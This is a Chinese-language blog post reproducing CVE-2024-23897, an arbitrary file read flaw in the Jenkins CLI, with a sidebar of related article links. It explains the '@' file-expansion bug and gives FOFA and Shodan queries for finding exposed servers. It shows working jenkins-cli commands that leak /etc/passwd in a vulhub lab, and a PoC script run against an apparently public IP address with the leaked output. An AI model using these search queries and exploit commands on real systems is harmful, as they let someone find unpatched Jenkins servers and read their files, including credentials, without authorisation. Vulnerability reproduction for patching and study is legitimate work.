Jenkins:CVE-2024-23897[任意文件读取]

最新推荐文章于 2024-08-08 21:01:07 发布
最新推荐文章于 2024-08-08 21:01:07 发布
阅读量574 收藏 3
点赞数 12
文章标签: jenkins 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/141025634
版权

Jenkins简介:一个开源的自动化服务器,它可以帮助自动化各种任务,包括构建、测试和部署软件。

漏洞原理

1.Jenkins服务器在处理客户端远程命令时,Jenkins 使用 args4j 库来解析 Jenkins 控制器上的命令参数和选项。

2.此命令解析器具有一项功能,可将参数中后跟文件路径的 @ 字符替换为文件的内容。

3.此功能默认启用,Jenkins 2.441 及更早版本、LTS 2.426.2 及更早版本不会禁用此功能。

FOFA查询语法

(header="X-Jenkins" || banner="X-Jenkins" || header="X-Hudson" || banner="X-Hudson" || header="X-Required-Permission: hudson.model.Hudson.Read" || banner="X-Required-Permission: hudson.model.Hudson.Read" || body="Jenkins-Agent-Protocols") && port="443"

Shodan语法

http.component:"Jenkins" port:8080

漏洞利用

1.开启vulhub靶场

cd ./vulhub-master/jenkins/CVE-2024-23897

docker-compose up

docker ps

          Name                        Command               State                                                           Ports
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
cve-2024-23897_jenkins_1   /usr/bin/tini -- /usr/loca ...   Up      0.0.0.0:50000->50000/tcp,:::50000->50000/tcp, 0.0.0.0:5005->5005/tcp,:::5005->5005/tcp,
                                                                    0.0.0.0:8080->8080/tcp,:::8080->8080/tcp

2.访问网页

http://ip:8080

 

3.下载客户端用于远程访问

wget http://IP:8080/jnlpJars/jenkins-cli.jar

4.使用客户端连接服务器,指定文件作为参数,回显文件内容

java -jar jenkins-cli.jar -s http://192.168.10.5:8080 help @/etc/passwd
[root@localhost ~]# java -jar jenkins-cli.jar -s http://192.168.10.5:8080 help @/etc/passwd

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

如果用户权限较高可使用 reload-job 读取文件完整内容

java -jar jenkins-cli.jar -s http://192.168.10.5:8080 reload-job @/etc/passwd

[root@localhost ~]# java -jar jenkins-cli.jar -s http://192.168.10.5:8080 reload-job @/etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such item ‘www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin’ exists.
root:x:0:0:root:/root:/bin/bash: No such item ‘root:x:0:0:root:/root:/bin/bash’ exists.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: No such item ‘mail:x:8:8:mail:/var/mail:/usr/sbin/nologin’ exists.
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such item ‘backup:x:34:34:backup:/var/backups:/usr/sbin/nologin’ exists.
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: No such item ‘_apt:x:42:65534::/nonexistent:/usr/sbin/nologin’ exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such item ‘nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin’ exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: No such item ‘lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin’ exists.
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such item ‘uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin’ exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin: No such item ‘bin:x:2:2:bin:/bin:/usr/sbin/nologin’ exists.
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such item ‘news:x:9:9:news:/var/spool/news:/usr/sbin/nologin’ exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: No such item ‘proxy:x:13:13:proxy:/bin:/usr/sbin/nologin’ exists.
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: No such item ‘irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin’ exists.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such item ‘list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin’ exists.
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: No such item ‘jenkins:x:1000:1000::/var/jenkins_home:/bin/bash’ exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such item ‘games:x:5:60:games:/usr/games:/usr/sbin/nologin’ exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such item ‘man:x:6:12:man:/var/cache/man:/usr/sbin/nologin’ exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such item ‘daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin’ exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin: No such item ‘sys:x:3:3:sys:/dev:/usr/sbin/nologin’ exists.
sync:x:4:65534:sync:/bin:/bin/sync: No such item ‘sync:x:4:65534:sync:/bin:/bin/sync’ exists.

poc工具使用

作者地址:GitHub - h4x0r-dz/CVE-2024-23897: CVE-2024-23897

CVE-2024-23897.py

CVE-2024-23897.py [-h] [-u URL] [-l LIST] -f文件

CVE-2024-23897漏洞脚本。

可选参数:
-h,——help显示帮助信息并退出
-u URL,——URL URL单目标URL。
-l LIST,——LIST LIST包含目标主机列表的文件。
-f FILE,——FILE FILE从服务器读取的文件路径。
[root@localhost CVE-2024-23897-main]# python3 CVE-2024-23897.py -u 52.83.63.195:9999 -f /etc/passwd
RESPONSE from 52.83.63.195:9999: b'\x00\x00\x00\x00\x01\x08\n\x00\x00\x00<\x08ERROR: Too many arguments: bin:x:1:1:bin:/bin:/sbin/nologin\n\x00\x00\x00\x1e\x08java -jar jenkins-cli.jar help\x00\x00\x00\n\x08 [COMMAND]\x00\x00\x00\x01\x08\n\x00\x00\x00N\x08Lists all the available commands or a detailed description of single command.\n\x00\x00\x00J\x08 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)\n\x00\x00\x00\x04\x04\x00\x00\x00\x02'

官方安全公告:Jenkins Security Advisory 2024-01-24

其他漏洞:https://korelogic.com/advisories.html

漏洞分析:Jenkins RCE漏洞PoC发布,CVE-2024-23897漏洞解析 - FreeBuf网络安全行业门户

漏洞利用及java低版本报错解决:Jenkins CLI 任意文件读取漏洞(CVE-2024-23897)复现 - BMCel - 博客园 (cnblogs.com)

 

Zeddm
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins CLI 任意文件读取漏洞复现(CVE-2024-23897)
0xSec
01-26 2430
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。 2024年1月,互联网公开了一个Jenkins任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000...
CVE-2024-23897 JenKins任意文件读取漏洞复现
m0_70489261的博客
02-27 1857
Jenkins提供了一个命令行的接口,用户可以在下载一个命令行客户端jenkins-cli.jar到本地,并调用该客户端来执行一些Jenkins的功能。
Jenkins任意文件读取CVE-2024-23897
qq_51175992的博客
03-11 881
Jenkins是一个开源的自动化服务器。Jenkins使用args4j来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。该漏洞影响Jenkins 2.441及以前的版本。
CVE-2024-23897 JenKins任意文件读取漏洞复现(1)
2401_84519960的博客
05-16 639
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
CVE-2024-23897 Jenkins 任意文件读取漏洞
LJQClqjc的博客
01-26 3077
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 ( expandAtFiles)。根据Jenkins 官方描述,具有Overall/Read权限的攻击者可以读取整个文件,未授权的攻击者仅能读取文件前几行内容。攻击者可以通过读取jenkins文件获取相关密钥从而实现命令执行。
Jenkins任意文件读取CVE-2024-23897】_jenkins 任意文件读取
2401_84254364的博客
05-16 606
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
推荐:利用CVE-2024-23897深入理解Jenkins安全漏洞与防护实践
gitblog_00097的博客
06-04 467
推荐:利用CVE-2024-23897深入理解Jenkins安全漏洞与防护实践 项目地址:https://gitcode.com/h4x0r-dz/CVE-2024-23897 1、项目介绍 该项目名为CVE-2024-23897,专注于揭示Jenkins中一个严重的任意文件读取漏洞,该漏洞可能导致远程代码执行(RCE)。这个开源工具旨在帮助系统管理员和安全研究人员检测并修复Jenkins实例上的...
Jenkins任意文件读取CVE-2024-23897
maxiluo的博客
01-27 293
Jenkins任意文件读取CVE-2024-23897,它影响了Jenkins的内置命令行接口(CLI)。这个接口有一个功能,可以用@字符后跟文件路径来替换为文件内容。这样,攻击者可以利用这个功能来读取Jenkins控制器文件系统上的任意文件。(1) Jenkins 2.442, LTS 2.426.3已禁用相关命令解析器特性。建议更新至这些版本以解决漏洞。(2) 收入到内网,若在公网暴露可设置ACL仅允许可信IP进行访问。
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
黑剑
03-05 4727
本文将深入研究一项涉及Jenkins安全漏洞(CVE-202423897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell。
Jenkins任意文件读取漏洞(CVE-2024-23897)复现
fly夏天的博客
01-30 1250
Jenkins任意文件读取漏洞(CVE-2024-23897)复现
jenkins-linter-idea-plugin:jenkins-linter-idea-plugin是一个Intellij Idea插件,用于通过Jenkins服务器的Pipeline Linter验证Jenkinsfiles
02-27
詹金斯·林特的想法插件jenkins-linter-idea-plugin是一个Intellij Idea插件,用于通过Jenkins服务器的验证Jenkinsfiles。特征 仅支持声明性管道 HTTP linter集成 清除错误突出显示安装该插件可以通过“设置” |...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
jenkins-update-center:詹金斯镜像更新中心生成器
02-21
詹金斯更新中心 詹金斯镜更新中心生成器 更新时间 每天凌晨1点UTC更新 镜像站点 腾讯 华为 清华 ustc 位 文件update-center.json ...wget https://cdn.jsdelivr.net/gh/lework/jenkins-update-center/rootC
官方Jenkins: jenkins-2.89.3-1.1.noarch.rpm包
05-16
官方Jenkins
jenkins自动化构建docker镜像并上传至harbor仓库
qq_41398235的博客
08-04 827
首先进入jenkins之后需要现在“Maven”、“GitLab”、“Jdk”、“SSH”、“Git”的相关插件,这里不再赘述,需要什么插件直接安装即可搜索对应插件后选择直接安装即可。
docker部署jenkinsjenkins的基本使用
最新发布
m0_63790435的博客
08-08 460
docker部署jenkinsjenkins的基本使用;jenkins创建任务;jenkins的CI/CD;
docker部署elasticsearch
m0_63790435的博客
08-08 207
docker部署elasticsearch;docker部署es;docker部署kibana
普元Devops学习笔记-devops构建后jenkins流水线sleep 1hr 23min的问题
cuipy的博客
08-08 414
java项目命名为 simple2。命名有点随意,不要在意这个,不重要。simple2的代码维护在gitlab中。simple2项目有两个git分支: dev 和 master开发中的代码在 dev分支,dev分支需要合并(merge)到master主分支。基于此目的,在普元devops中创建一个构建,该构建的任务列表中,只有一个:代码库分支合并。任务的配置如下:执行该构建,会在jenkins中创建一个临时job,该job的类型是流水线,该流水线会创建一个gitlab的分支合并请求。
docker run -itd -p 9090:8080 -p 50000:50000 --name jenkins --privileged=true -v /home/jenkins:/var/jenkins_home jenkins/jenkins:lts
06-09
这是一个使用Docker部署Jenkins服务的命令,其中: - -itd: 以交互式、终端模式、并且后台运行容器 - -p 9090:8080: 将主机的9090端口映射到容器的8080端口 - -p 50000:50000: 将主机的50000端口映射到容器的50000端口 - --name jenkins: 指定容器的名称为jenkins - --privileged=true: 以特权模式运行容器,可以访问主机的所有设备 - -v /home/jenkins:/var/jenkins_home: 将主机的/home/jenkins目录挂载到容器的/var/jenkins_home目录,以持久化Jenkins数据 - jenkins/jenkins:lts: 使用jenkins/jenkins:lts镜像启动容器,其中lts表示使用长期支持版本的Jenkins 这个命令和前面的命令相比,只是将映射的端口、挂载的目录、镜像等参数有所不同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值